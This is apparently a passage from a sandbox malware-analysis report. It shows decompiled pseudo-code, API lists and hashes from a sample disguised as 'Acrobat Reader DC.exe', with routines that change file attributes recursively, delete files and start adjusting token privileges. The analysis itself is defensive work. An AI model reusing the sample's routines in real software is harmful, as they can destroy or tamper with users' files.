                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                  • String ID: \*.*
                                  • API String ID: 2188072990-1173974218
                                  • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                  • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                  • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                  • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E004033C0(void* __edx, void* __fp0, char _a1, char _a2, signed int _a3, void* _a4, WCHAR* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a28, char _a48, intOrPtr _a52, signed char _a68, intOrPtr _a72, char _a84, WCHAR* _a92, short _a96, short _a624, char _a1152, short _a1672, char _a2200, char _a10392, char _a10912) {
                                  				char _v0;
                                  				char _v19;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t146;
                                  				signed int _t147;
                                  				void* _t151;
                                  				signed char _t180;
                                  				char _t182;
                                  				intOrPtr _t183;
                                  				void* _t191;
                                  				void* _t197;
                                  				signed int _t198;
                                  				signed int _t202;
                                  				signed int _t203;
                                  				signed int _t204;
                                  				signed int _t207;
                                  				void* _t210;
                                  				void* _t211;
                                  				void* _t212;
                                  				void* _t213;
                                  				char* _t215;
                                  				intOrPtr* _t216;
                                  				signed int _t225;
                                  				intOrPtr _t226;
                                  				signed int _t277;
                                  				signed int _t278;
                                  				signed int _t280;
                                  				signed int _t282;
                                  				intOrPtr* _t284;
                                  				signed int _t285;
                                  				signed int _t286;
                                  				void* _t288;
                                  				void* _t290;
                                  				void* _t291;
                                  
                                  				_t322 = __fp0;
                                  				_t286 = _t285 & 0xfffffff8;
                                  				E00422240(0x2cac);
                                  				_t146 =  *0x4a9538; // 0x0
                                  				_t147 = _t146 + 1;
                                  				 *0x4a9538 = _t147;
                                  				_t294 = _t147 - 0x30;
                                  				if(_t147 >= 0x30) {
                                  					E00454014(__eflags, __fp0, _a4, _a16, _a24, L"#include depth exceeded.  Make sure there are no recursive includes", _a20);
                                  					 *0x4a9538 =  *0x4a9538 - 1;
                                  					_t151 = 0;
                                  					L42:
                                  					return _t151;
                                  				}
                                  				_t270 = _a8;
                                  				_t225 = 1;
                                  				_a4 = 0;
                                  				_a1 = 1;
                                  				_a3 = 1;
                                  				_a2 = 0;
                                  				E0040DA60( &_a24, _t294);
                                  				E00401B10(_t270,  &_a8, _t294);
                                  				if(E0040DE40(0x2000,  &_a24, _t270,  &_a8) == 0) {
                                  					_v0 = 1;
                                  				} else {
                                  					_v0 = 0;
                                  				}
                                  				E00402250( &_a8);
                                  				if(_v0 != 0) {
                                  					E00454014(__eflags, _t322, _a4, _a16, _a24, L"Error opening the file", _a20);
                                  					E00443FDF( &_a4);
                                  					 *0x4a9538 =  *0x4a9538 - 1;
                                  					_t151 = 0;
                                  					goto L42;
                                  				} else {
                                  					GetCurrentDirectoryW(0x104,  &_a1672);
                                  					GetFullPathNameW(_t270, 0x104,  &_a96,  &_a92);
                                  					E00413A0E( &_a96,  &_a84,  &_a1152,  &_a10912,  &_a10392);
                                  					E00411567( &_a624,  &_a84);
                                  					E00411536( &_a624,  &_a1152);
                                  					_t288 = _t286 + 0x24;
                                  					_t237 =  &_a624;
                                  					SetCurrentDirectoryW( &_a624);
                                  					while(_t225 == 1) {
                                  						_a2200 = 0;
                                  						E00403350( &_a48);
                                  						_t180 = _a68;
                                  						if((_t180 & 0x00000003) != 0) {
                                  							_t182 = E0045F6BB(_t237, __eflags, _t322,  &_a24,  &_a48);
                                  							_t226 = 0;
                                  						} else {
                                  							_t299 = _t180 & 0x00000004;
                                  							if((_t180 & 0x00000004) != 0) {
                                  								_t182 = E00468961( &_a24, __eflags, _t322,  &_a24,  &_a48);
                                  								_t226 = 0;
                                  							} else {
                                  								_t226 = 0;
                                  								_push(0x10);
                                  								_a12 = 0;
                                  								_a16 = 0x10;
                                  								_t215 = E004115D7(_t270,  &_a48, _t299);
                                  								_push(4);
                                  								_a8 = _t215;
                                  								 *_t215 = 0;
                                  								_t216 = E004115D7(_t270,  &_a48, _t299);
                                  								_t288 = _t288 + 8;
                                  								if(_t216 == 0) {
                                  									_a20 = 0;
                                  								} else {
                                  									 *_t216 = 1;
                                  									_a20 = _t216;
                                  								}
                                  								if(E004037A0( &_a24,  &_a8, _t322) == 0) {
                                  									E00401350( &_a8);
                                  									_t182 = 0;
                                  								} else {
                                  									E00403AF0(_t226,  &_a8,  &_a48);
                                  									_t284 = _a12;
                                  									 *_t284 =  *_t284 - 1;
                                  									if( *_t284 == 0) {
                                  										_t237 = _a8;
                                  										_push(_a8);
                                  										E004111DC();
                                  										_push(_t284);
                                  										E004111DC();
                                  										_t288 = _t288 + 8;
                                  									}
                                  									_t182 = 1;
                                  								}
                                  							}
                                  						}
                                  						if(_t182 == 0) {
                                  							L41:
                                  							E0040DA20( &_a24);
                                  							_a68 = _t226;
                                  							_a72 = _t226;
                                  							SetCurrentDirectoryW( &_a1672);
                                  							E0040DA20( &_a24);
                                  							_a68 = _t226;
                                  							_a72 = _t226;
                                  							E00402250( &_a48);
                                  							E0040DA20( &_a24);
                                  							_push(_a28);
                                  							E004111DC();
                                  							_t151 = _a1;
                                  							 *0x4a9538 =  *0x4a9538 - 1;
                                  							__eflags =  *0x4a9538;
                                  							goto L42;
                                  						} else {
                                  							_t183 = _a52;
                                  							if(_t183 > 0xffe) {
                                  								_t277 = _t183 - 0xffe;
                                  								E004026F0( &_a48);
                                  								E00410E60(_a48 + 0x1ffc, _a48 + 0x1ffc + _t277 * 2, _a52 - _t277 + _a52 - _t277 - 0x1ffa);
                                  								_t288 = _t288 + 0xc;
                                  								_a52 = _a52 - _t277;
                                  							}
                                  							E00411567( &_a2200, _a48);
                                  							_a4 = _a4 + 1;
                                  							_t290 = _t288 + 8;
                                  							_t278 = 0;
                                  							_t270 = 0;
                                  							while(1) {
                                  								_t227 =  *(_t290 + 0x8a8 + _t278 * 2) & 0x0000ffff;
                                  								_t191 = E0041324E( *(_t290 + 0x8a8 + _t278 * 2) & 0x0000ffff);
                                  								_t288 = _t290 + 4;
                                  								if(_t191 == 0) {
                                  									break;
                                  								}
                                  								_t213 = E00413225(_t237, _t227);
                                  								_t290 = _t288 + 4;
                                  								if(_t213 != 0) {
                                  									_t278 = _t278 + 1;
                                  									continue;
                                  								}
                                  								break;
                                  							}
                                  							if( *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2)) == _t270) {
                                  								L21:
                                  								 *((short*)(_t288 + 0x8a8 + _t270 * 2)) = 0;
                                  								if(E004039A0( &_a2200) == 0) {
                                  									E00454014(__eflags, _t322, _a4, _a16, _a4, L"Unterminated string",  &_a2200);
                                  									_v19 = 0;
                                  									break;
                                  								}
                                  								_t197 = E004111C1( &_a2200);
                                  								_t291 = _t288 + 4;
                                  								if(_t197 == 0) {
                                  									L28:
                                  									_v0 = 0;
                                  									_t198 = E004111C1( &_a2200);
                                  									_t288 = _t291 + 4;
                                  									if(_t198 > 2) {
                                  										_t280 = _t198;
                                  										_t210 = E00413225( *(_t288 + 0x8a4 + _t280 * 2) & 0x7f,  *(_t288 + 0x8a4 + _t280 * 2) & 0x7f);
                                  										_t288 = _t288 + 4;
                                  										if(_t210 != 0) {
                                  											__eflags =  *((short*)(_t288 + 0x8a6 + _t280 * 2)) - 0x5f;
                                  											if( *((short*)(_t288 + 0x8a6 + _t280 * 2)) == 0x5f) {
                                  												 *((short*)(_t288 + 0x8a6 + _t280 * 2)) = 0;
                                  												_v0 = 1;
                                  											}
                                  										}
                                  									}
                                  									if(_a2 == 1) {
                                  										_t237 = _a4;
                                  										E00434963(_a4,  &_a2200);
                                  									} else {
                                  										_t279 = _a4;
                                  										_t237 = _a4;
                                  										_t202 = E00403A20(_a4,  &_a2200, _t322,  &_a2200,  &_a96,  &_a4,  &_a24);
                                  										if(_t202 != 3) {
                                  											_t203 = _t202;
                                  											__eflags = _t203;
                                  											if(_t203 == 0) {
                                  												_a1 = 0;
                                  												L33:
                                  												if(_v0 == 1) {
                                  													_a2 = 1;
                                  												} else {
                                  													_a2 = 0;
                                  												}
                                  												if(_a1 != 1) {
                                  													break;
                                  												} else {
                                  													_t225 = _a3;
                                  													continue;
                                  												}
                                  											}
                                  											_t204 = _t203 - 2;
                                  											__eflags = _t204;
                                  											if(_t204 == 0) {
                                  												goto L32;
                                  											}
                                  											_t207 = _t204 - 2;
                                  											__eflags = _t207;
                                  											if(_t207 == 0) {
                                  												_a3 = _t207;
                                  											}
                                  											goto L33;
                                  										}
                                  										L32:
                                  										_t237 = _a4;
                                  										E00403A50( &_a2200, _a4, _t279, _a4, _a12);
                                  									}
                                  									goto L33;
                                  								}
                                  								_t66 = _t197 - 1; // -1
                                  								_t282 = _t66;
                                  								if(_t282 < 0) {
                                  									L27:
                                  									 *((short*)(_t291 + 0x8aa + _t282 * 2)) = 0;
                                  									goto L28;
                                  								}
                                  								while(1) {
                                  									_t270 =  *(_t291 + 0x8a8 + _t282 * 2) & 0x0000ffff;
                                  									_t211 = E0041324E( *(_t291 + 0x8a8 + _t282 * 2) & 0x0000ffff);
                                  									_t291 = _t291 + 4;
                                  									if(_t211 == 0) {
                                  										goto L27;
                                  									}
                                  									_t212 = E00413225(_t237, _t270);
                                  									_t291 = _t291 + 4;
                                  									if(_t212 != 0) {
                                  										_t282 = _t282 - 1;
                                  										__eflags = _t282;
                                  										if(_t282 >= 0) {
                                  											continue;
                                  										}
                                  									}
                                  									goto L27;
                                  								}
                                  								goto L27;
                                  							} else {
                                  								goto L20;
                                  							}
                                  							do {
                                  								L20:
                                  								_t237 =  *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2));
                                  								 *((short*)(_t288 + 0x8a8 + _t270 * 2)) =  *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2));
                                  								_t278 = _t278 + 1;
                                  								_t270 =  &(_t270[0]);
                                  							} while ( *((short*)(_t288 + 0x8a8 + _t278 * 2)) != 0);
                                  							goto L21;
                                  						}
                                  					}
                                  					_t226 = 0;
                                  					goto L41;
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                  • __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscpy.LIBCMT ref: 004034A7
                                  • _wcscat.LIBCMT ref: 004034BC
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                  • _wcscpy.LIBCMT ref: 004035A0
                                  • _wcslen.LIBCMT ref: 00403623
                                  • _wcslen.LIBCMT ref: 0040367D
                                  Strings
                                  • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                  • Unterminated string, xrefs: 00428348
                                  • _, xrefs: 0040371C
                                  • Error opening the file, xrefs: 00428231
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                  • API String ID: 3393021363-188983378
                                  • Opcode ID: 9c138f860f86a0d4610993aab54d097ae5008560e405b0aba632f65b2ab93e4d
                                  • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                  • Opcode Fuzzy Hash: 9c138f860f86a0d4610993aab54d097ae5008560e405b0aba632f65b2ab93e4d
                                  • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00431A86(intOrPtr __ecx, WCHAR* _a4, signed int _a8, signed int _a12, char _a16) {
                                  				struct _WIN32_FIND_DATAW _v596;
                                  				intOrPtr _v600;
                                  				void* _t33;
                                  				void* _t34;
                                  				void* _t43;
                                  				void* _t46;
                                  				void* _t55;
                                  				void* _t77;
                                  				void* _t83;
                                  				signed int _t89;
                                  				void* _t91;
                                  
                                  				_t91 = (_t89 & 0xfffffff8) - 0x254;
                                  				_v600 = __ecx;
                                  				_t55 = 0;
                                  				_t83 = FindFirstFileW(_a4,  &_v596);
                                  				if(_t83 == 0xffffffff) {
                                  					L7:
                                  					FindClose(_t83);
                                  					if(_a16 != 0) {
                                  						_t77 = FindFirstFileW("*.*",  &_v596);
                                  						if(_t77 == 0xffffffff) {
                                  							L18:
                                  							FindClose(_t77);
                                  							return 1;
                                  						} else {
                                  							do {
                                  								if((_v596.dwFileAttributes & 0x00000010) == 0) {
                                  									goto L17;
                                  								} else {
                                  									_t33 = E0041313C( &(_v596.cFileName), ".");
                                  									_t91 = _t91 + 8;
                                  									if(_t33 == 0) {
                                  										goto L17;
                                  									} else {
                                  										_t34 = E0041313C( &(_v596.cFileName), 0x48ab30);
                                  										_t91 = _t91 + 8;
                                  										if(_t34 == 0) {
                                  											goto L17;
                                  										} else {
                                  											SetCurrentDirectoryW( &(_v596.cFileName));
                                  											if(E00431A86(_v600, _a4, _a8, _a12, _a16) == 0) {
                                  												FindClose(_t77);
                                  												return 0;
                                  											} else {
                                  												SetCurrentDirectoryW(0x48ab30);
                                  												goto L17;
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L20;
                                  								L17:
                                  							} while (FindNextFileW(_t77,  &_v596) != 0);
                                  							goto L18;
                                  						}
                                  					} else {
                                  						return _t55;
                                  					}
                                  				} else {
                                  					do {
                                  						_t43 = E0041313C( &(_v596.cFileName), ".");
                                  						_t91 = _t91 + 8;
                                  						if(_t43 == 0) {
                                  							goto L6;
                                  						} else {
                                  							_t46 = E0041313C( &(_v596.cFileName), 0x48ab30);
                                  							_t91 = _t91 + 8;
                                  							if(_t46 == 0) {
                                  								goto L6;
                                  							} else {
                                  								if(SetFileAttributesW( &(_v596.cFileName), (GetFileAttributesW( &(_v596.cFileName)) | _a8) &  !_a12) == 0) {
                                  									FindClose(_t83);
                                  									return 0;
                                  								} else {
                                  									_t55 = 1;
                                  									goto L6;
                                  								}
                                  							}
                                  						}
                                  						goto L20;
                                  						L6:
                                  					} while (FindNextFileW(_t83,  &_v596) != 0);
                                  					goto L7;
                                  				}
                                  				L20:
                                  			}















                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                  • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                  • FindClose.KERNEL32(00000000), ref: 00431B20
                                  • FindClose.KERNEL32(00000000), ref: 00431B34
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                  • FindClose.KERNEL32(00000000), ref: 00431BCD
                                  • FindClose.KERNEL32(00000000), ref: 00431BDB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                  • String ID: *.*
                                  • API String ID: 1409584000-438819550
                                  • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                  • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                  • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                  • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00442886(intOrPtr __ecx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                  				intOrPtr _v8;
                                  				struct _WIN32_FIND_DATAW _v604;
                                  				void* _t32;
                                  				void* _t33;
                                  				void* _t42;
                                  				void* _t45;
                                  				void* _t47;
                                  				void* _t50;
                                  				void* _t66;
                                  				void* _t67;
                                  				void* _t69;
                                  
                                  				_v8 = __ecx;
                                  				_t50 = 0;
                                  				_t67 = FindFirstFileW(_a4,  &_v604);
                                  				if(_t67 == 0xffffffff) {
                                  					L7:
                                  					FindClose(_t67);
                                  					if(_a16 != 0) {
                                  						_t66 = FindFirstFileW("*.*",  &_v604);
                                  						if(_t66 == 0xffffffff) {
                                  							L18:
                                  							FindClose(_t66);
                                  							return 1;
                                  						} else {
                                  							do {
                                  								if((_v604.dwFileAttributes & 0x00000010) == 0) {
                                  									goto L17;
                                  								} else {
                                  									_t32 = E0041313C( &(_v604.cFileName), ".");
                                  									_t69 = _t69 + 8;
                                  									if(_t32 == 0) {
                                  										goto L17;
                                  									} else {
                                  										_t33 = E0041313C( &(_v604.cFileName), 0x48ab30);
                                  										_t69 = _t69 + 8;
                                  										if(_t33 == 0) {
                                  											goto L17;
                                  										} else {
                                  											SetCurrentDirectoryW( &(_v604.cFileName));
                                  											if(E00442886(_v8, _a4, _a8, _a12, _a16) == 0) {
                                  												FindClose(_t66);
                                  												return 0;
                                  											} else {
                                  												SetCurrentDirectoryW(0x48ab30);
                                  												goto L17;
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L20;
                                  								L17:
                                  							} while (FindNextFileW(_t66,  &_v604) != 0);
                                  							goto L18;
                                  						}
                                  					} else {
                                  						return _t50;
                                  					}
                                  				} else {
                                  					do {
                                  						_t42 = E0041313C( &(_v604.cFileName), ".");
                                  						_t69 = _t69 + 8;
                                  						if(_t42 == 0) {
                                  							goto L6;
                                  						} else {
                                  							_t45 = E0041313C( &(_v604.cFileName), 0x48ab30);
                                  							_t69 = _t69 + 8;
                                  							if(_t45 == 0) {
                                  								goto L6;
                                  							} else {
                                  								_t47 = E00433C08( &(_v604.cFileName), _a8, _a12);
                                  								_t69 = _t69 + 0xc;
                                  								if(_t47 == 0) {
                                  									FindClose(_t67);
                                  									return 0;
                                  								} else {
                                  									_t50 = 1;
                                  									goto L6;
                                  								}
                                  							}
                                  						}
                                  						goto L20;
                                  						L6:
                                  					} while (FindNextFileW(_t67,  &_v604) != 0);
                                  					goto L7;
                                  				}
                                  				L20:
                                  			}















                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                  • FindClose.KERNEL32(00000000), ref: 0044291C
                                  • FindClose.KERNEL32(00000000), ref: 00442930
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                  • FindClose.KERNEL32(00000000), ref: 004429D4
                                    • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                  • FindClose.KERNEL32(00000000), ref: 004429E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                  • String ID: *.*
                                  • API String ID: 2640511053-438819550
                                  • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                  • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                  • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                  • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044BF8B(void* __edx, void* __eflags, intOrPtr _a4) {
                                  				char _v524;
                                  				char _v1044;
                                  				char _v1564;
                                  				struct _WIN32_FIND_DATAW _v2156;
                                  				short _v2684;
                                  				char _v2692;
                                  				char _v2693;
                                  				void* _t29;
                                  				char _t48;
                                  				void* _t65;
                                  				signed int _t68;
                                  				void* _t71;
                                  				void* _t72;
                                  
                                  				_v2693 = 0;
                                  				E00410120( &_v2684, _a4, __edx);
                                  				_t29 = E00433998( &_v2684);
                                  				_t71 = (_t68 & 0xfffffff8) - 0xa88 + 4;
                                  				if(_t29 != 0) {
                                  					E00411536( &_v2684, L"\\*.*");
                                  					_t71 = _t71 + 8;
                                  				}
                                  				E00413A0E( &_v2684,  &_v2692,  &_v1564,  &_v524,  &_v1044);
                                  				_t72 = _t71 + 0x14;
                                  				_t65 = FindFirstFileW( &_v2684,  &_v2156);
                                  				_t48 = 1;
                                  				if(_t65 == 0xffffffff) {
                                  					L9:
                                  					FindClose(_t65);
                                  					return _v2693;
                                  				} else {
                                  					while(_t48 == 1) {
                                  						if((_v2156.dwFileAttributes & 0x00000010) != 0) {
                                  							L6:
                                  							if(FindNextFileW(_t65,  &_v2156) == 0) {
                                  								_t48 = 0;
                                  							}
                                  							continue;
                                  						} else {
                                  							_v2693 = _t48;
                                  							E00411567( &_v2684,  &_v2692);
                                  							E00411536( &_v2684,  &_v1564);
                                  							E00411536( &_v2684,  &(_v2156.cFileName));
                                  							_t72 = _t72 + 0x18;
                                  							if(DeleteFileW( &_v2684) != 1) {
                                  								FindClose(_t65);
                                  								return 0;
                                  							} else {
                                  								goto L6;
                                  							}
                                  						}
                                  						goto L10;
                                  					}
                                  					goto L9;
                                  				}
                                  				L10:
                                  			}

















                                  APIs
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,0040F545,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,004A90E8,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                  • _wcscat.LIBCMT ref: 0044BFC5
                                  • __wsplitpath.LIBCMT ref: 0044BFEF
                                  • FindFirstFileW.KERNEL32(?,?), ref: 0044C004
                                  • _wcscpy.LIBCMT ref: 0044C030
                                  • _wcscat.LIBCMT ref: 0044C042
                                  • _wcscat.LIBCMT ref: 0044C054
                                  • DeleteFileW.KERNEL32(?), ref: 0044C061
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044C075
                                  • FindClose.KERNEL32(00000000), ref: 0044C084
                                  • FindClose.KERNEL32(00000000), ref: 0044C093
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FileFind$_wcscat$Close$AttributesDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                  • String ID: \*.*
                                  • API String ID: 3771809977-1173974218
                                  • Opcode ID: ed66a4a5c2d47a5941d3310c8672dc2671f9469612d4f27da2b7748a55e83c30
                                  • Instruction ID: a80060c485f0c376bb4167ae0b00d0fca8fe69e194215be70a311f08e499f8fe
                                  • Opcode Fuzzy Hash: ed66a4a5c2d47a5941d3310c8672dc2671f9469612d4f27da2b7748a55e83c30
                                  • Instruction Fuzzy Hash: 3B31C472409300AAC720DFA0DC84ADFB7DCAF99314F444E1EFA8982151EB38D24887A7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004333BE(int _a4, intOrPtr _a8) {
                                  				void* _v8;
                                  				intOrPtr _v12;
                                  				struct _TOKEN_PRIVILEGES _v24;
                                  				int _t27;
                                  				int _t29;
                                  				int _t31;
                                  
